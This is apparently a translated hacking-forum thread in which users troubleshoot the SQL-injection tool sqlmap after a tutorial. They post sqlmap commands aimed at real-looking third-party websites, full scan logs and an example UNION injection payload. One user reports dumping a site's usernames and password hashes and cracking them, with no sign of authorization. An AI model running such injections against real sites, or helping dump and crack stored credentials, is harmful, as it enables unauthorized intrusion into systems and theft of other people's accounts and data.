SQLi Sqlmap.py
#31
Already put in the target

step 1
|
step 2
|
step 3
|
step 4

and in the end I came down with step sickness...

ehehehehehe
Life has to be lived happy..!!!

#32
Nice share, bro,
I'll bookmark it for now.

#33
OK then..

#34
Haven't found the bug yet???

#35
What's the problem with the Google dork, bro?

#36
Bro, I have a question. When I start it for the very first time, why does it look like this?
root@bt:/pentest/database/sqlmap# python sqlmap.py -u https://www.marshalls.ky/vehicles.php?id=4 --dbs
Traceback (most recent call last):
File "sqlmap.py", line 27, in <module>
from lib.controller.controller import start
File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in <module>
from lib.controller.action import action
File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in <module>
from lib.controller.handler import setHandler
File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in <module>
from plugins.dbms.mssqlserver import MSSQLServerMap
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line 14, in <module>
from plugins.dbms.mssqlserver.enumeration import Enumeration
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", line 28, in <module>
from plugins.generic.enumeration import Enumeration as GenericEnumeration
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16, in <module>
from lib.core.common import BigArray
ImportError: cannot import name BigArray

#37
Bro, what if the databases don't show up? For example, when we run
--------------------------------
# python sqlmap.py -u http://www.side.com/index.php?id=7 --dbs
--------------------------------

no databases show up, like "admin" and so on. In my terminal only this appears:
---------------------------------
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:42:54

[03:42:55] [INFO] using '/pentest/database/sqlmap/output/side.com/session' as session file
[03:42:56] [INFO] testing connection to the target url
[03:43:05] [INFO] testing if the url is stable, wait a few seconds
[03:43:07] [INFO] url is stable
[03:43:07] [INFO] testing if GET parameter 'id' is dynamic
[03:43:08] [INFO] confirming that GET parameter 'id' is dynamic
[03:43:08] [INFO] GET parameter 'id' is dynamic
^C
[03:43:08] [ERROR] user aborted

[*] shutting down at: 03:43:08

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.side.com/index.php?id=7 --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 03:43:17

[03:43:17] [INFO] using '/pentest/database/sqlmap/output/www.side.com/session' as session file
[03:43:18] [INFO] testing connection to the target url
[03:43:20] [INFO] testing if the url is stable, wait a few seconds
[03:43:24] [INFO] url is stable
[03:43:24] [INFO] testing if GET parameter 'id' is dynamic
[03:43:25] [INFO] confirming that GET parameter 'id' is dynamic
[03:43:26] [INFO] GET parameter 'id' is dynamic
[03:43:28] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[03:43:28] [INFO] testing sql injection on GET parameter 'id'
[03:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:43:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[03:44:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[03:44:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[03:44:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[03:44:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:44:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[03:44:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[03:44:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:44:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[03:44:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[03:45:04] [INFO] testing 'Oracle AND time-based blind'
[03:45:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[03:46:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[03:46:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
[03:48:30] [WARNING] GET parameter 'id' is not injectable
[03:48:30] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

--------------------------------

If there really were a bug, it should show up like this, right...? (example)
--------------------------------
Place: GET
Parameter: id
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=11 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,102,109,100,58),CHAR(70,90,99,74,104,99,88,71,102,102),CHAR(58,111,105,97,58)), NULL#
---

[02:50:29] [INFO] manual usage of GET payloads requires url encoding
[02:50:29] [INFO] testing MySQL
[02:50:30] [INFO] confirming MySQL
[02:50:34] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[02:50:34] [INFO] fetching database names
[02:50:42] [INFO] the SQL query used returns 2 entries
[02:50:50] [INFO] retrieved: "sango"
[02:51:00] [INFO] retrieved: "information_schema"
available databases [2]:
[*] information_schema
[*] xxxxxxxx
---------------------------

Does that mean the site has no bug, or what, bro....?? I'm still hazy on this. Do you have any advice on what I should learn first...?

#38
(12-05-2011, 11:25 PM)OWL#9 Wrote: Bro, I have a question. When I start it for the very first time, why does it look like this?
root@bt:/pentest/database/sqlmap# python sqlmap.py -u https://www.marshalls.ky/vehicles.php?id=4 --dbs
Traceback (most recent call last):
File "sqlmap.py", line 27, in <module>
from lib.controller.controller import start
File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in <module>
from lib.controller.action import action
File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in <module>
from lib.controller.handler import setHandler
File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in <module>
from plugins.dbms.mssqlserver import MSSQLServerMap
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line 14, in <module>
from plugins.dbms.mssqlserver.enumeration import Enumeration
File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", line 28, in <module>
from plugins.generic.enumeration import Enumeration as GenericEnumeration
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16, in <module>
from lib.core.common import BigArray
ImportError: cannot import name BigArray

As far as I know, either the file is missing or it's an error... better to just update it.... you can take a look here

Code:
http://forum.indonesianbacktrack.or.id/showthread.php?tid=1572

Every Second, Every Minutes, Every Hours, Every Days Its Never End

#39
Bro, I managed to dump the table and got the usernames and passwords, but the passwords are encrypted. I tried decrypting them with an md5 decrypter and it didn't work T_T. How do I decrypt the passwords, bro?
(01-26-2012, 06:36 PM)shin_orochi Wrote: Bro, I managed to dump the table and got the usernames and passwords, but the passwords are encrypted. I tried decrypting them with an md5 decrypter and it didn't work T_T. How do I decrypt the passwords, bro?

Oh, never mind, I found it. Anyway, thanks for the tutorial, bro, it works!

#40
Sorry, I have a question about sqlmap: suppose all the tables have already been found and we want to download the database or the contents of those tables, can that be done without having to type the --dump command?

Thanks in advance.